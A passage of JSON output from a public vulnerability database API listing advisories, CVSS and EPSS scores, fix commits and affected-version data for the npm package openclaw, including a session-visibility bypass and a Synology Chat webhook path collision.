blecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2k
hh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv
6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-57gh-m6rq-54cf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x794-wfnf-1ugf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89234?fo
rmat=json","vulnerability_id":"VCID-x7uw-s9a6-fybd","summary":"OpenClaw: `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n## Summary\n`session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped v2026.3.22: non-sandboxed session_status skipped the shared visibility guard, but this is a same-agent session-policy bypass with unreleased fix, not a broader host-boundary break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d369a3400dc9b737fbe8daa63f09d909ce7beb8` — 2026-03-30T16:48:12+02:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75"},{"reference_url":"https://github.com/advisories/GHSA-fwjq-xwfj-gv75","reference_id":"GHSA-fwjq-xwfj-gv75","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fwjq-xwfj-gv75"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vul
nerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vul
nerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-fwjq-xwfj-gv75"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x7uw-s9a6-fybd"},{"url":"http://public2.vulnerablecode.io/api/vuln
erabilities/91235?format=json","vulnerability_id":"VCID-x9qg-8qk5-s3d6","summary":"OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n## Summary\nSynology Chat multi-account configuration could collapse onto a shared webhook path, replacing route ownership and bypassing per-account DM policy separation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `980940aa58f862da4e19372597bbc2a9f268d70b`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/accounts.ts now distinguishes inherited base webhook paths from explicit per-account paths.\n- extensions/synology-chat/src/gateway-runtime.ts now fails closed on inherited or duplicate webhook paths and registers routes without replacement.\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13338","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.133","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13342","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35635"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"C
VSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"GHSA-rqp8-q22p-5j9q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rqp8-q22p-5j9q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerabili
ty":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerabili
ty":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerabili
ty":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"V